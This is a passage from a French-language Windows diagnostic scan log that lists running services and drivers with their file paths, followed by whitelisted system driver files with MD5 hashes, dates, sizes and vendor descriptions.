S1 - MpKsle3ebe7f7 () -> \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{2268DAE1-C678-477F-857C-D3B0FD5046A1}\MpKsle3ebe7f7.sys
R1 - Msfs () -> (?)
R1 - mssmbios (Pilote BIOS de gestion de systèmes Microsoft) -> system32\DRIVERS\mssmbios.sys
R1 - NetBIOS (NetBIOS Interface) -> system32\DRIVERS\netbios.sys
R1 - NetBT (@%SystemRoot%\system32\drivers\netbt.sys,-2) -> System32\DRIVERS\netbt.sys
R1 - Npfs () -> (?)
R1 - nsiproxy (@%SystemRoot%\system32\drivers\nsiproxy.sys,-2) -> system32\drivers\nsiproxy.sys
R1 - Null () -> (?)
R1 - Psched (@%SystemRoot%\System32\drivers\pacer.sys,-101) -> system32\DRIVERS\pacer.sys
R1 - rdbss (@%systemroot%\system32\wkssvc.dll,-1000) -> system32\DRIVERS\rdbss.sys
R1 - RDPCDD (@%systemroot%\system32\DRIVERS\RDPCDD.sys,-100) -> System32\DRIVERS\RDPCDD.sys
R1 - RDPENCDD (@%systemroot%\system32\drivers\RDPENCDD.sys,-101) -> system32\drivers\rdpencdd.sys
R1 - RDPREFMP (@%systemroot%\system32\drivers\RdpRefMp.sys,-101) -> system32\drivers\rdprefmp.sys
S1 - Serial (Pilote de port série) -> system32\DRIVERS\serial.sys
R1 - tdx (@%SystemRoot%\system32\tcpipcfg.dll,-50004) -> system32\DRIVERS\tdx.sys
R1 - TermDD (Pilote de périphérique terminal) -> system32\DRIVERS\termdd.sys
R1 - VgaSave () -> \SystemRoot\System32\drivers\vga.sys
R1 - vwififlt (Virtual WiFi Filter Driver) -> system32\DRIVERS\vwififlt.sys
R1 - Wanarpv6 (@%systemroot%\system32\rascfg.dll,-32012) -> system32\DRIVERS\wanarp.sys
R1 - WfpLwf (WFP Lightweight Filter) -> system32\DRIVERS\wfplwf.sys
R1 - ws2ifsl (Environnement de prise en charge de Fournisseur de services non-IFS Windows Sockets 2.0) -> \SystemRoot\system32\drivers\ws2ifsl.sys
R2 - AdobeARMservice (Adobe Acrobat Update Service) -> "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
R2 - AMD External Events Utility () -> %SystemRoot%\system32\atiesrxx.exe
R2 - AudioEndpointBuilder (@%SystemRoot%\system32\audiosrv.dll,-204) -> %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted
R2 - AudioSrv (@%SystemRoot%\system32\audiosrv.dll,-200) -> %SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted
R2 - BFE (@%SystemRoot%\system32\bfe.dll,-1001) -> %systemroot%\system32\svchost.exe -k LocalServiceNoNetwork
R2 - BITS (@%SystemRoot%\system32\qmgr.dll,-1000) -> %SystemRoot%\System32\svchost.exe -k netsvcs
R2 - camfrog_update_service (Camfrog Update Service) -> "C:\Program Files (x86)\Camfrog\Camfrog Video Chat\update\cf_update_service.exe"
S2 - clr_optimization_v4.0.30319_32 (Microsoft .NET Framework NGEN v4.0.30319_X86) -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
S2 - clr_optimization_v4.0.30319_64 (Microsoft .NET Framework NGEN v4.0.30319_X64) -> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
R2 - CryptSvc (@%SystemRoot%\system32\cryptsvc.dll,-1001) -> %SystemRoot%\system32\svchost.exe -k NetworkService
R2 - cvhsvc (Client Virtualization Handler) -> "C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE"
R2 - DcomLaunch (@oleres.dll,-5012) -> %SystemRoot%\system32\svchost.exe -k DcomLaunch
R2 - Dhcp (@%SystemRoot%\system32\dhcpcore.dll,-100) -> %SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted
R2 - DiagTrack (@%SystemRoot%\system32\UtcResources.dll,-3001) -> %SystemRoot%\System32\svchost.exe -k utcsvc
R2 - DigitalWave.Update.Service (Digital Wave Update Service) -> "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe"
R2 - Dnscache (@%SystemRoot%\System32\dnsapi.dll,-101) -> %SystemRoot%\system32\svchost.exe -k NetworkService
R2 - DPS (@%systemroot%\system32\dps.dll,-500) -> %SystemRoot%\System32\svchost.exe -k LocalServiceNoNetwork
R2 - DsiWMIService (Dritek WMI Service) -> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
R2 - eventlog (@%SystemRoot%\system32\wevtsvc.dll,-200) -> %SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted
R2 - EventSystem (@comres.dll,-2450) -> %SystemRoot%\system32\svchost.exe -k LocalService
R2 - FontCache (@%systemroot%\system32\FntCache.dll,-100) -> %SystemRoot%\system32\svchost.exe -k LocalService
R2 - gpsvc (@gpapi.dll,-112) -> %windir%\system32\svchost.exe -k GPSvcGroup
S2 - gupdate (Service Google Update (gupdate)) -> "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
R2 - IAStorDataMgrSvc (Technologie de stockage Intel(R) Rapid) -> "C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe"
R2 - iphlpsvc (@%SystemRoot%\system32\iphlpsvc.dll,-500) -> %SystemRoot%\System32\svchost.exe -k NetSvcs
R2 - LanmanServer (@%systemroot%\system32\srvsvc.dll,-100) -> %SystemRoot%\system32\svchost.exe -k netsvcs
R2 - LanmanWorkstation (@%systemroot%\system32\wkssvc.dll,-100) -> %SystemRoot%\System32\svchost.exe -k NetworkService
R2 - lltdio (Link-Layer Topology Discovery Mapper I/O Driver) -> system32\DRIVERS\lltdio.sys
R2 - lmhosts (@%SystemRoot%\system32\lmhsvc.dll,-101) -> %SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted
R2 - LMS (Intel(R) Management and Security Application Local Management Service) -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
R2 - luafv (@%systemroot%\system32\drivers\luafv.sys,-100) -> \SystemRoot\system32\drivers\luafv.sys
S2 - MBAMService () -> "C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe"
S2 - MMCSS (@%systemroot%\system32\mmcss.dll,-100) -> %SystemRoot%\system32\svchost.exe -k netsvcs
R2 - MpsSvc (@%SystemRoot%\system32\FirewallAPI.dll,-23090) -> %SystemRoot%\system32\svchost.exe -k LocalServiceNoNetwork
R2 - MsMpSvc (Microsoft Antimalware Service) -> "c:\Program Files\Microsoft Security Client\MsMpEng.exe"
R2 - NlaSvc (@%SystemRoot%\System32\nlasvc.dll,-1) -> %SystemRoot%\System32\svchost.exe -k NetworkService
R2 - nsi (@%SystemRoot%\system32\nsisvc.dll,-200) -> %systemroot%\system32\svchost.exe -k LocalService
R2 - PcaSvc (@%SystemRoot%\system32\pcasvc.dll,-1) -> %systemroot%\system32\svchost.exe -k LocalSystemNetworkRestricted
R2 - PEAUTH (PEAUTH) -> system32\drivers\peauth.sys
R2 - PlugPlay (@%SystemRoot%\system32\umpnpmgr.dll,-100) -> %SystemRoot%\system32\svchost.exe -k DcomLaunch
R2 - Power (@%SystemRoot%\system32\umpo.dll,-100) -> %SystemRoot%\system32\svchost.exe -k DcomLaunch
R2 - ProfSvc (@%systemroot%\system32\profsvc.dll,-300) -> %systemroot%\system32\svchost.exe -k netsvcs
R2 - RpcEptMapper (@%windir%\system32\RpcEpMap.dll,-1001) -> %SystemRoot%\system32\svchost.exe -k RPCSS
R2 - RpcSs (@oleres.dll,-5010) -> %SystemRoot%\system32\svchost.exe -k rpcss
R2 - rspndr (Link-Layer Topology Discovery Responder) -> system32\DRIVERS\rspndr.sys
R2 - SamSs (@%SystemRoot%\system32\samsrv.dll,-1) -> %SystemRoot%\system32\lsass.exe
R2 - Schedule (@%SystemRoot%\system32\schedsvc.dll,-100) -> %systemroot%\system32\svchost.exe -k netsvcs
R2 - SENS (@%SystemRoot%\system32\Sens.dll,-200) -> %SystemRoot%\system32\svchost.exe -k netsvcs
R2 - sftlist (Application Virtualization Client) -> "C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe"
R2 - SharedAccess (@%SystemRoot%\system32\ipnathlp.dll,-106) -> %SystemRoot%\System32\svchost.exe -k netsvcs
R2 - ShellHWDetection (@%SystemRoot%\System32\shsvcs.dll,-12288) -> %SystemRoot%\System32\svchost.exe -k netsvcs
S2 - SkypeUpdate (Skype Updater) -> "C:\Program Files (x86)\Skype\Updater\Updater.exe"
R2 - Spooler (@%systemroot%\system32\spoolsv.exe,-1) -> %SystemRoot%\System32\spoolsv.exe
S2 - sppsvc (@%SystemRoot%\system32\sppsvc.exe,-101) -> %SystemRoot%\system32\sppsvc.exe
R2 - stisvc (@%SystemRoot%\system32\wiaservc.dll,-9) -> %SystemRoot%\system32\svchost.exe -k imgsvc
R2 - SysMain (@%SystemRoot%\system32\sysmain.dll,-1000) -> %systemroot%\system32\svchost.exe -k LocalSystemNetworkRestricted
R2 - tcpipreg (TCP/IP Registry Compatibility) -> System32\drivers\tcpipreg.sys
R2 - Themes (@%SystemRoot%\System32\themeservice.dll,-8192) -> %SystemRoot%\System32\svchost.exe -k netsvcs
R2 - TrkWks (@%SystemRoot%\system32\trkwks.dll,-1) -> %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted
R2 - UNS (Intel(R) Management & Security Application User Notification Service) -> "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe"
R2 - UxSms (@%SystemRoot%\system32\dwm.exe,-2000) -> %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted
R2 - Winmgmt (@%Systemroot%\system32\wbem\wmisvc.dll,-205) -> %systemroot%\system32\svchost.exe -k netsvcs
R2 - Wlansvc (@%SystemRoot%\System32\wlansvc.dll,-257) -> %SystemRoot%\system32\svchost.exe -k LocalSystemNetworkRestricted
R2 - wlidsvc (Windows Live ID Sign-in Assistant) -> "C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"
R2 - wscsvc (@%SystemRoot%\System32\wscsvc.dll,-200) -> %SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted
R2 - WSearch (@%systemroot%\system32\SearchIndexer.exe,-103) -> %systemroot%\system32\SearchIndexer.exe /Embedding
R2 - wuauserv (@%systemroot%\system32\wuaueng.dll,-105) -> %systemroot%\system32\svchost.exe -k netsvcs

---------- | System files (Microsoft Files whitelisted)

[MD5.2F6B34B83843F0C5118B63AC634F5BF4] - [10/06/2009 22:36:24] - (.Copyright © 2006 Adaptec, Inc. - Adaptec Windows SAS/SATA Storport Driver.) - [479.58 Ko] - (1.6.6.4) - C:\Windows\System32\Drivers\adp94xx.sys
[MD5.597F78224EE9224EA1A13D6350CED962] - [13/07/2009 23:59:32] - (.Copyright © 2006 Adaptec, Inc. - Adaptec Windows SATA Storport Driver.) - [331.58 Ko] - (1.6.6.1) - C:\Windows\System32\Drivers\adpahci.sys
[MD5.E109549C90F62FB570B9540C4B148E54] - [13/07/2009 23:59:33] - (.Copyright © 2003 Adaptec, Inc. - Adaptec StorPort Ultra320 SCSI Driver (X64).) - [178.58 Ko] - (7.2.0.0) - C:\Windows\System32\Drivers\adpu320.sys
[MD5.5812713A477A3AD7363C7438CA2EE038] - [14/07/2009 01:19:47] - (.Copyright (C) Acer Laboratories Inc.  2000  - ALi mini IDE Driver.) - [15.08 Ko] - (1.2.0.0) - C:\Windows\System32\Drivers\aliide.sys
[MD5.1FF8B4431C353CE385C875F194924C0C] - [14/07/2009 01:19:49] - (.Copyright (C) AMD 2003 - Pilote IDE AMD.) - [15.08 Ko] - (6.1.7600.16385) - C:\Windows\System32\Drivers\amdide.sys
[MD5.D4121AE6D0C0E7E13AA221AA57EF2D49] - [17/08/2012 11:10:32] - (.Copyright © 2008-2010 AMD, Inc. - AHCI 1.2 Device Driver.) - [105.38 Ko] - (1.1.2.5) - C:\Windows\System32\Drivers\amdsata.sys
[MD5.F67F933E79241ED32FF46A4F29B5120B] - [10/06/2009 22:37:35] - (.2008 Advanced Micro Devices, Inc. - AMD Technology AHCI Compatible Controller Driver for Windows - AMD64 platform.) - [189.58 Ko] - (3.6.1540.127) - C:\Windows\System32\Drivers\amdsbs.sys
[MD5.540DAF1CEA6094886D72126FD7C33048] - [17/08/2012 11:10:32] - (.Copyright © 2008-2010 AMD, Inc. - Storage Filter Driver.) - [26.38 Ko] - (1.1.2.5) - C:\Windows\System32\Drivers\amdxata.sys
[MD5.C484F8CEB1717C540242531DB7845C4E] - [13/07/2009 23:59:33] - (.Copyright 2007 Adaptec, Inc. - Adaptec RAID Storport Driver.) - [85.58 Ko] - (5.2.0.10384) - C:\Windows\System32\Drivers\arc.sys
[MD5.019AF6924AEFE7839F61C830227FE79C] - [13/07/2009 23:59:33] - (.Copyright 2008 Adaptec, Inc. - Adaptec SAS RAID WS03 Driver.) - [95.56 Ko] - (5.2.0.16119) - C:\Windows\System32\Drivers\arcsas.sys
[MD5.437F55435623D4D54D36197F5AD8B435] - [06/11/2012 13:11:52] - (.© Advanced Micro Devices. - AMD High Definition Audio Function Driver.) - [94 Ko] - (7.12.0.7712) - C:\Windows\System32\Drivers\AtihdW76.sys
[MD5.74687C33C4AD25A975BBB1EA1E8B3884] - [30/03/2014 20:45:44] - (.Copyright (C) 1998-2006 ATI Technologies Inc. - ATI Radeon Kernel Mode Driver.) - [6695.5 Ko] - (8.1.1.1038) - C:\Windows\System32\Drivers\atikmdag.sys
[MD5.C7F56ED86327A78E7F8A5CC503A98BD6] - [30/03/2014 20:45:44] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - AMD multi-vendor Miniport Driver.) - [258 Ko] - (8.14.1.6117) - C:\Windows\System32\Drivers\atikmpag.sys
[MD5.2D659B569A76CDB83B815675A80D7096] - [07/02/2013 12:21:06] - (.1998-2010, Broadcom Corp. All Rights Rsvd - Broadcom 802.11 Network Adapter wireless driver.) - [4073.56 Ko] - (5.100.249.2) - C:\Windows\System32\Drivers\BCMWL664.SYS
[MD5.F09EEE9EDC320B5E1501F749FDE686C8] - [14/07/2009 03:19:59] - (.Copyright (C) Brother Industries, Ltd. 2001-2003 - Windows ME USB Mass-Storage Bulk-Only Lower Filter Driver.) - [18 Ko] - (1.10.0.2) - C:\Windows\System32\Drivers\BrFiltLo.sys
[MD5.B114D3098E9BDB8BEA8B053685831BE6] - [14/07/2009 03:20:21] - (.Copyright (C) Brother Industries, Ltd. 2001 - Windows ME USB Mass-Storage Bulk-Only Upper Filter Driver.) - [8.5 Ko] - (1.4.0.1) - C:\Windows\System32\Drivers\BrFiltUp.sys
[MD5.43BEA8D483BF1870F018E2D02E06A5BD] - [14/07/2009 03:19:06] - (.Copyright (C) Brother Industries Ltd.1997-2006 - Pilote Brother Série I/F (WDM).) - [280 Ko] - (1.0.1.6) - C:\Windows\System32\Drivers\BrSerId.sys
[MD5.A6ECA2151B08A09CACECA35C07F05B42] - [14/07/2009 03:20:11] - (.Copyright (C) Brother Industries Ltd.1997-2003 - Brother Serial driver (WDM version).) - [46 Ko] - (1.0.0.20) - C:\Windows\System32\Drivers\BrSerWdm.sys
[MD5.B79968002C277E869CF38BD22CD61524] - [14/07/2009 03:20:26] - (.Copyright(C)Brother Industries Ltd.1997-2006 - Brother USB MDM Driver.) - [14.63 Ko] - (1.0.0.12) - C:\Windows\System32\Drivers\BrUsbMdm.sys
[MD5.A87528880231C54E75EA7A44943B38BF] - [14/07/2009 03:20:15] - (.Copyright(C)Brother Industries Ltd.1997-2006 - Brother USB Serial Driver.) - [14.38 Ko] - (1.0.1.3) - C:\Windows\System32\Drivers\BrUsbSer.sys
[MD5.3E5B191307609F7514148C6832BB0842] - [10/06/2009 22:34:28] - (.(c) COPYRIGHT 2001-2008 Broadcom Corporation - Broadcom NetXtreme II GigE VBD.) - [457.5 Ko] - (4.8.2.0) - C:\Windows\System32\Drivers\bxvbda.sys
[MD5.E19D3F095812725D88F9001985B94EDD] - [14/07/2009 01:19:48] - (.Copyright (C) CMD Technology, Inc. 1999-2000 - CMD PCI IDE Bus Driver.) - [17.08 Ko] - (2.0.7.0) - C:\Windows\System32\Drivers\cmdide.sys
[MD5.0E5DA5369A0FCAEA12456DD852545184] - [10/06/2009 22:36:49] - (.Copyright © 2003-2009 Emulex - Storport Miniport Driver for LightPulse HBAs.) - [518.06 Ko] - (7.2.10.211) - C:\Windows\System32\Drivers\elxstor.sys
[MD5.3B32CAA07D672F8A2E0DF5CB3A873F45] - [24/06/2016 23:54:11] - (.-.) - [22.17 Ko] - (1.2.0.119) - C:\Windows\System32\Drivers\EsgScanner.sys
[MD5.DC5D737F51BE844D8C82C695EB17372F] - [10/06/2009 22:34:33] - (.(c) COPYRIGHT 2001-2008 Broadcom Corporation - Broadcom NetXtreme II 10 GigE VBD.) - [3209 Ko] - (4.8.13.0) - C:\Windows\System32\Drivers\evbda.sys
[MD5.84D3088475BD9BC56ED76D6E0F740A63] - [28/10/2013 23:10:10] - (.Copyright (C), 1988-2006, Huawei Tech. Co., Ltd. - HUAWEI USB Smart Card Driver.) - [29 Ko] - (1.0.0.0) - C:\Windows\System32\Drivers\ewdcsc.sys
[MD5.E0C7255498640FC64B19AAE17FD6F965] - [28/10/2013 23:10:10] - (.Copyright (C) Huawei Technologies Co., Ltd. 2004-2006. - USB Modem/Serial Device Driver.) - [111.13 Ko] - (1.0.0.6) - C:\Windows\System32\Drivers\ewusbdev.sys
[MD5.D96A290F699081AE737390C0FE329D7C] - [28/10/2013 23:10:10] - (.Copyright (C) Huawei Technologies Co., Ltd. 2004-2006. - USB Modem/Serial Device Driver.) - [114.25 Ko] - (2.0.3.824) - C:\Windows\System32\Drivers\ewusbmdm.sys
[MD5.53913561A7089C9A4649CE4E42F6101B] - [28/10/2013 23:10:10] - (.Copyright (C) Huawei Technologies Co., Ltd. 2004-2007. - USB NDIS Miniport Driver.) - [129.5 Ko] - (1.0.2.904) - C:\Windows\System32\Drivers\ewusbnet.sys
[MD5.F2523EF6460FC42405B12248338AB2F0] - [14/07/2009 00:53:43] - (.Copyright ©2007-2009 Hauppauge Computer Works, Inc. - Hauppauge WinTV 885 Consumer IR Driver for eHome.) - [30.5 Ko] - (1.31.27127.0) - C:\Windows\System32\Drivers\hcw85cir.sys
[MD5.B6AC71AAA2B10848F57FC49D55A651AF] - [18/09/2009 04:54:54] - (.Copyright © 2006-2009, Intel Corporation. - Intel(R) Management Engine Interface.) - [55.02 Ko] - (6.0.0.1179) - C:\Windows\System32\Drivers\HECIx64.sys
[MD5.39D2ABCD392F3D8A6DCE7B60AE7B8EFC] - [21/11/2010 05:23:47] - (.Copyright (c) 2004-2010 Hewlett-Packard Development Company, L.P. - Smart Array SAS/SATA Controller Media Driver.) - [76.88 Ko] - (6.12.6.64) - C:\Windows\System32\Drivers\HpSAMD.sys
[MD5.AE0C5DF7E7DA3E7AC29B64CFA8C4F044] - [07/02/2013 12:23:04] - (.Copyright(C) Intel Corporation 1994-2012  - Intel Rapid Storage Technology driver - x64.) - [637.05 Ko] - (11.7.0.1013) - C:\Windows\System32\Drivers\iaStorA.sys
[MD5.711241EA1BA9DB44F34D03D2AD00ED08] - [07/02/2013 12:23:04] - (.Copyright(C) Intel Corporation 1994-2012  - Intel Rapid Storage Technology Filter driver - x64.) - [27.55 Ko] - (11.7.0.1013) - C:\Windows\System32\Drivers\iaStorF.sys
[MD5.AAAF44DB3BD0B9D1FB6969B23ECC8366] - [17/08/2012 11:10:32] - (.Copyright(C) Intel Corporation 1994-2008  - Intel Matrix Storage Manager driver - x64.) - [400.88 Ko] - (8.6.2.1014) - C:\Windows\System32\Drivers\iaStorV.sys
[MD5.F4F91789C7C7A159CE8215C1F69F2A85] - [10/01/2012 22:28:18] - (.Copyright (c) 1998-2006 Intel Corporation. - Intel Graphics Kernel Mode Driver.) - [12023.34 Ko] - (8.15.10.2622) - C:\Windows\System32\Drivers\igdkmd64.sys
[MD5.5C18831C61933628F5BB0EA2675B9D21] - [13/07/2009 23:59:33] - (.Copyright © 2002-05 Intel Corp./ICP vortex GmbH - Intel/ICP Raid Storport Driver.) - [43.08 Ko] - (5.4.22.0) - C:\Windows\System32\Drivers\iirsp.sys
[MD5.B2B34FD7372E6E01A26E9AE22CC8F1EC] - [07/02/2013 12:20:25] - (.Copyright 2000-2011, Broadcom Corporation. - Broadcom NetLink (TM) Gigabit Ethernet NDIS6.x Unified Driver..) - [423.8 Ko] - (15.4.0.9) - C:\Windows\System32\Drivers\k57nd60a.sys
[MD5.A43A9920D2409BB9DA747D2FD20A2E61] - [19/12/2012 17:03:49] - (.2001-2012 Qualcomm Atheros Co., Ltd. - Qualcomm Atheros Ar81xx series PCI-E Gigabit Ethernet Controller.) - [108.15 Ko] - (2.1.0.7) - C:\Windows\System32\Drivers\L1C62x64.sys
[MD5.1A93E54EB0ECE102495A51266DCDB6A6] - [13/07/2009 23:59:34] - (.Copyright © LSI Corporation 2008 - LSI Fusion-MPT FC Driver (StorPort).) - [112.06 Ko] - (1.28.3.52) - C:\Windows\System32\Drivers\lsi_fc.sys
[MD5.1047184A9FDC8BDBFF857175875EE810] - [13/07/2009 23:59:33] - (.Copyright © LSI Corporation 2008 - LSI Fusion-MPT SAS Driver (StorPort).) - [104.06 Ko] - (1.28.3.52) - C:\Windows\System32\Drivers\lsi_sas.sys
[MD5.30F5C0DE1EE8B5BC9306C1F0E4A75F93] - [13/07/2009 23:59:34] - (.Copyright © LSI Corporation 2009 - LSI SAS Gen2 Driver (StorPort).) - [64.06 Ko] - (2.0.2.71) - C:\Windows\System32\Drivers\lsi_sas2.sys
[MD5.0504EACAFF0D3C8AED161C4B0D369D4A] - [13/07/2009 23:59:33] - (.Copyright © LSI Corporation 2008 - LSI Fusion-MPT SCSI Driver (StorPort).) - [113.06 Ko] - (1.28.3.67) - C:\Windows\System32\Drivers\lsi_scsi.sys
[MD5.78BFF5425E044086E74E78650A359FBB] - [25/06/2016 20:30:29] - (.© Malwarebytes. - Malwarebytes Anti-Malware.) - [26.38 Ko] - (0.1.16.0) - C:\Windows\System32\Drivers\mbam.sys
[MD5.1239597BAB7EED2BB16D035AF87E65D9] - [25/06/2016 20:30:29] - (.© Malwarebytes. - Malwarebytes Chameleon Protection Driver.) - [137.38 Ko] - (1.1.22.0) - C:\Windows\System32\Drivers\mbamchameleon.sys
[MD5.78488AF2AB2111D67B3C4044707A519B] - [25/06/2016 20:31:04] - (.© Malwarebytes. - Malwarebytes Anti-Malware.) - [187.71 Ko] - (0.3.0.4) - C:\Windows\System32\Drivers\MBAMSwissArmy.sys
[MD5.A55805F747C6EDB6A9080D7C633BD0F4] - [10/06/2009 22:37:14] - (.Copyright © LSI Corporation          - MEGASAS RAID Controller Driver for Windows 7\Server 2008 R2 for x64.) - [34.56 Ko] - (4.5.1.64) - C:\Windows\System32\Drivers\megasas.sys
[MD5.BAF74CE0072480C3B6B7C13B2A94D6B3] - [13/07/2009 23:59:33] - (.Copyright (C) 2007 LSI Corporation. - LSI MegaRAID Software RAID Driver.) - [278.06 Ko] - (13.5.409.2009) - C:\Windows\System32\Drivers\MegaSR.sys
[MD5.452ACB7A9914398D9E18CCCFFCF92208] - [25/06/2016 20:30:29] - (.© Malwarebytes Corporation. - Malwarebytes Web Access Control.) - [63.38 Ko] - (1.0.6.0) - C:\Windows\System32\Drivers\mwac.sys
[MD5.77889813BE4D166CDAB78DDBA990DA92] - [13/07/2009 23:59:33] - (.(C) Copyright IBM Corp. 1994, 2002. - IBM ServeRAID Controller Driver.) - [50.06 Ko] - (7.10.0.0) - C:\Windows\System32\Drivers\nfrd960.sys
[MD5.0A92CB65770442ED0DC44834632F66AD] - [17/08/2012 11:10:32] - (.Copyright(C) 2001-2010 NVIDIA Corporation - NVIDIA® nForce(TM) RAID Driver.) - [144.88 Ko] - (10.6.0.18) - C:\Windows\System32\Drivers\nvraid.sys
[MD5.DAB0E87525C10052BF65F06152F37E4A] - [17/08/2012 11:10:31] - (.Copyright(C) 2001-2010 NVIDIA Corporation - NVIDIA® nForce(TM) Sata Performance Driver.) - [162.38 Ko] - (10.6.0.18) - C:\Windows\System32\Drivers\nvstor.sys
[MD5.6F35274DE7C7CCBA78EAC5C0FFA5FE29] - [22/07/2015 05:32:22] - (.Copyright © 2001-2010 - USB Modem/Serial Device Driver.) - [263.72 Ko] - (2.1.1.7) - C:\Windows\System32\Drivers\qcusbser.sys
[MD5.A53A15A11EBFD21077463EE2C7AFEEF0] - [10/06/2009 22:37:36] - (.Copyright © QLogic Corporation 1996-2009 - QLogic Fibre Channel Stor Miniport Driver.) - [1489.08 Ko] - (9.1.8.6) - C:\Windows\System32\Drivers\ql2300.sys
[MD5.4F6D12B51DE1AAEFF7DC58C4D75423C8] - [13/07/2009 23:59:34] - (.© QLogic Corporation. - QLogic iSCSI Storport Miniport Driver.) - [125.58 Ko] - (2.1.3.20) - C:\Windows\System32\Drivers\ql40xx.sys
[MD5.BD9BA262CF26EFE9A9867EBE32D12164] - [17/08/2012 14:17:21] - (.Copyright (C) 2012 Realtek Semiconductor Corporation. All Right Reserved.             - Realtek 8136/8168/8169 NDIS 6.20 64-bit Driver               .) - [691.6 Ko] - (7.58.411.2012) - C:\Windows\System32\Drivers\Rt64win7.sys
[MD5.C2F868881D48A568B525255F084EF063] - [07/02/2013 12:24:28] - (.Copyright (c) Realtek Semiconductor Corp.1998-2012 - Realtek(r) High Definition Audio Function Driver.) - [3970.02 Ko] - (6.0.1.6662) - C:\Windows\System32\Drivers\RTKVHD64.sys
[MD5.3EA8A16169C26AFBEB544E0E48421186] - [14/07/2009 04:36:07] - (.© 2006 Macrovision Corporation  - Macrovision SECURITY Driver.) - [22.5 Ko] - (4.3.86.0) - C:\Windows\System32\Drivers\secdrv.sys
[MD5.C1D8E28B2C2ADFAEC4BA89E9FDA69BD6] - [14/07/2009 02:00:40] - (.Copyright (C) Brother Industries Ltd.1997-2006 - Pilote Brother Série I/F (WDM).) - [92 Ko] - (6.1.7600.16385) - C:\Windows\System32\Drivers\serial.sys
[MD5.843CAF1E5FDE1FFD5FF768F23A51E2E1] - [10/06/2009 22:37:40] - (.Copyright (c) SiS Corp. 2000-2010 - SiS RAID Stor Miniport Driver.) - [42.56 Ko] - (5.1.1039.2600) - C:\Windows\System32\Drivers\sisraid2.sys
[MD5.6A6C106D42E9FFFF8B9FCB4F754F6DA4] - [13/07/2009 23:59:33] - (.Copyright (c) SiS Corp. 2007-2013 - SiS AHCI Stor-Miniport Driver.) - [78.58 Ko] - (5.1.1039.3600) - C:\Windows\System32\Drivers\sisraid4.sys
[MD5.4DE0D5D747A73797C95A97DCCE5018B5] - [13/05/2011 04:21:02] - (.© Google Inc. - ADB Interface.) - [35.48 Ko] - (1.0.1.1) - C:\Windows\System32\Drivers\ssadadb.sys
[MD5.8F8324ED1DE63FFC7B1A02CD2D963C72] - [13/05/2011 04:21:02] - (.Copyright (c) 1997-2011  MCCI Corporation  - SAMSUNG Android USB Composite Device Driver.) - [153.98 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadbus.sys
[MD5.D13C15E4124B6AD2BAF9CB2192213EA7] - [13/05/2011 04:21:02] - (.Copyright (c) 1997-2011  MCCI Corporation  - Windows 2000/XP support functions.) - [12.98 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadcm.sys
[MD5.D13C15E4124B6AD2BAF9CB2192213EA7] - [13/05/2011 04:21:02] - (.Copyright (c) 1997-2011  MCCI Corporation  - Windows 2000/XP support functions.) - [12.98 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadcmnt.sys
[MD5.58221EFCB74167B73667F0024C661CE0] - [13/05/2011 04:21:02] - (.Copyright (c) 1997-2011  MCCI Corporation  - SAMSUNG Android USB Modem Filter Driver.) - [16.48 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadmdfl.sys
[MD5.4DA7C71BFAC5AD71255B7E4CAB980163] - [13/05/2011 04:21:04] - (.Copyright (c) 1997-2011  MCCI Corporation  - SAMSUNG Android USB Modem.) - [173.48 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadmdm.sys
[MD5.D33D1BD3EC0E766211A234F56A12726D] - [13/05/2011 04:21:04] - (.Copyright (c) 1997-2011  MCCI Corporation  - SAMSUNG Android USB Diagnostic Serial Port Device Driver.) - [143.48 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadserd.sys
[MD5.8EEA35B5D1718C546C767FF47CEDF4FE] - [13/05/2011 04:21:04] - (.Copyright (c) 1997-2011  MCCI Corporation  - Windows 2000/XP support functions.) - [13.48 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadwh.sys
[MD5.8EEA35B5D1718C546C767FF47CEDF4FE] - [13/05/2011 04:21:04] - (.Copyright (c) 1997-2011  MCCI Corporation  - Windows 2000/XP support functions.) - [13.48 Ko] - (5.28.2.1) - C:\Windows\System32\Drivers\ssadwhnt.sys
[MD5.ED161B91FDF7EAA39469D72D463D5F4E] - [11/11/2010 02:11:50] - (.Copyright (c) 1997-2010  MCCI Corporation  - SAMSUNG USB Composite Device Driver.) - [133.07 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdbus.sys
[MD5.7B3BCF14103863D755AB1D5A5E76CA10] - [11/11/2010 02:11:50] - (.Copyright (c) 1997-2010  MCCI Corporation  - Windows 2000/XP support functions.) - [15.07 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdcm.sys
